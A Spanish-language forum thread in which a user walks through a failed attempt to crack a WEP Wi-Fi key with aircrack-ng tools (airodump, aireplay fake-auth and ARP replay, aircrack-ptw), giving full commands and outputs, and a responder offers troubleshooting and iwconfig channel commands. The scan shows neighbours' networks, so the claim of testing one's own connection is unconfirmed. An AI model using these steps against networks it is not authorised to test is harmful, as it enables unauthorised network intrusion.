Ayuda con wifislax y backtrack

Que tal, estoy tratando de aprender a usar wifislax 3.1, intento buscar la clave de mi conexión a internet con ayuda de wifislax y backtrack pero no lo he logrado y no entiendo porque, en internet encontré un tutorial que considere muy sencillo pero me aparece un mensaje de error y no entindo me podrías ayudar a entenderlo y a corregislo ! De antemano muchas gracias por tu tiempo y tu ayuda!
Ok mi wireless es una " conexión de red intel(r) pro/wireless 2915abg (192.[trial version])." pero la verdad creo que es otra cosa porque ya lo intente con 4 tarjetas y es el mismo problema estos son los pasos que sigo y lo que me aparece:
1 Abro una consola y ejecuto el comando:
iwconfig
Lo no wireless extensions.
eth2        no wireless extensions.
eth3        unassociated           ESSID:off/any
               Mode:Monitor        Frequency=2.457
               Bit  Rate:0  kb/s     Tx-Power=20  dBm       Sensitivity=8/0
               Retry  limit:7     RTS   thr:off     Fragment   thr:off
               Encryption   key:off
               Link  Quality:0   Signal   level:0   Noise   level:0
               Rx   invalid  nwid:0  Rx   invalid  crypt:0   Rx  invalid  frag:0
               Tx   excessive   retries:0    Invalid   misc:0    Missed  beacon:0
rtap0       no wireless extensions
Entiendo que mi tarjeta es eth3
2. En la misma consola ejecuto el siguiente comando (que entiendo es para activar mi tarjeta en modo monitor en el canal 11):
airmon-ng start eth3 11
Interface                  Chipset                                    Driver
eth3                      Centrino b/g                            ipw2200 (monitor mode enabled)
Entiendo que fue activada en modo monitor
3. Nuevamente en la misma consola ejecuto el comando (que entiendo es para crear un archivo con el nombre " PRUEBA " en el canal " 11"
airodump-ng -w PRUEBA -c11 eth3
4. Me aparece la siguiente información:
CH 11 ] [ Elapsed:  28 s  ] [  2009-11-24   18:44
BSSID                     PWR RXQ Beacons #Data,#/s CH MB ENC  CIPHER AUTH ESSID
00:1D:5A:37:A5:41 0 24 111 8 0 11 54. Wep wep infinitum3058
00:23:51:B9:D1:59 0 25 81 0 0 9 54. Wep wep infinitum3172
00:21:7C:8E:67:B9   0      9     112           0      0   11 54. WEP   WEP         karla
5. Abro una segunda consola y ejecuto el comando:
aireplay-ng -1 30 -e INFINITUM3058 -a 00:1D:5A:37:A5:41 -h 00:13:CE:99:F8:85 eth3
18:50:53: Waiting for beacon frame (BSSID:   00:1D:5A:37:A5:41)
18:50:53  Sending Authentication Request
18:50:56  Sending Authentication Request
18:50:58  Sending Authentication Request
18:51:00  Sending Authentication Request
18:51:02  Sending Authentication Request
18:51:04  Sending Authentication Request
18:51:06  Sending Authentication Request
Attack was unsuccessful. Possible reasons:
*Perhaps MAC address filtering is enabled.
*Check that the BSSID (-a option) is correct.
*Try to change the number of packets (-o option).
*This attack sometimes fails against some APs.
*The card is not on the same channel as the AP.
*Injection is not supported AT ALL on HermesI,
  Centrino, ndiswrapper and a few others chipsets.
*You´re too far from the AP. Get Closer, or lower
  The Transmit rate (iwconfig iface rate 1M).
Este mismo mensaje me aparece con WIFISLAX y BACKTRACK no se a que se refiera.
6. En esa misma consola ejecuto:
aireplay-ng -3 -x600 -b 00:1D:5A:37:A5:41 -h 00:13:CE:99:F8:85 eth3
Saving ARP requests in replay-arp-1124-185345.cap
You should also start airodump-ng to capture replies.
Read 25742 packets (got 278 ARP requests), sent  1023006 packets.(510 pps)
7. Por ultimo ejecuto aircrack-ptw PRUEBA-01.cap y en automático me abre una consola con la siguiente información:
aircrack-ptw PRUEBA-01.cap
This is aircrack-ptw 1.0.0
For more informations see http://www.cdc.informatik.tu-darms
/aircrack-ptw/
Allocating a new table
bssid = 00:1D:5A:37:A5:41   keyindex=0
stats for bssid 00:1D:5A:37:A5:41  keyindex:0 packets=369
aircrack-ptw PRUEBA-01.cap
This is aircrack-ptw 1.0.0
For more informations see http://www.cdc.informatik.tu-darms
/aircrack-ptw/
bssid = 00:1D:5A:37:A5:41   keyindex=0
stats for bssid 00:1D:5A:37:A5:41  keyindex:0 packets=383
Esto mismo ya lo intente con 4 wireless y con wifislax y backtrack es lo mismo espero me puedas ayudar """""""""""" muchas Gracias """"""""""""

1 respuesta

Respuesta
Para ser sincero hace mucho tiempo no hago nada de este tipo de "Pruebas" con herramientas hacking.
Pero por el tipo del error que te da te dice las posibles opciones :
1. Es común este error en ciertos AP
2. El ap y la tarjeta de red no están en el mismo canal
3. El ap esta muy largo de la tarjeta de red y la señal es baja
4. Intenta cambiar la cantidad de paquestes con la opciones -o
5. Revisa el bssid haber si esta correcto
6. Hay chipset que no soportan esto como el centrino ...
7. Tal vez el filtrado de direcciones MAC este activo .
Así que te recomiendo que revises 1 por 1 estos posibles errores para descartar.
Ok me puedes decir como checar en que el canal de mi lap, esto en referencia a la opción 2 gracias
Creo que el comando es iwconfig [interface] osea iwconfig [eth3]
Para fijar el canal es iwconfig eth3 channel 6
Este es para fijar la frecuencia iwconfig eth3 freq 2.412G
lo mejor es fijar el canal ya que el solo te pone la frecuencia .
Esta es la tabla de canales con su frecuencia :
canal 1= 2.412G
canal 2= 2.417G
canal 3= 2.422G
canal 4= 2.427G
canal 5= 2.432G
canal 6= 2.437G
canal 7= 2.442G
canal 8= 2.447G
canal 9= 2.452G
canal 10= 2.457G
canal 11= 2.462G
canal 12= 2.467G
canal 13= 2.472G
canal 14= 2.484G
Revisa bien la sintaxis de los comandos que te di que aquí donde estoy no tengo linux a mano y no pude probarlos... pero esa es la idea xDD
Que tal, ya intente tu recomendación pero sigue sin funcionar, de casualidad me podrías decir donde puedo conseguir un tutorial para principiantes de antemano muchas gracias por tu ayuda
Amigo si te a funcionado favor cierra la pregunta para poder seguir ayudando a más usuarios ya que cuando hay varias abiertas no me llegan más preguntas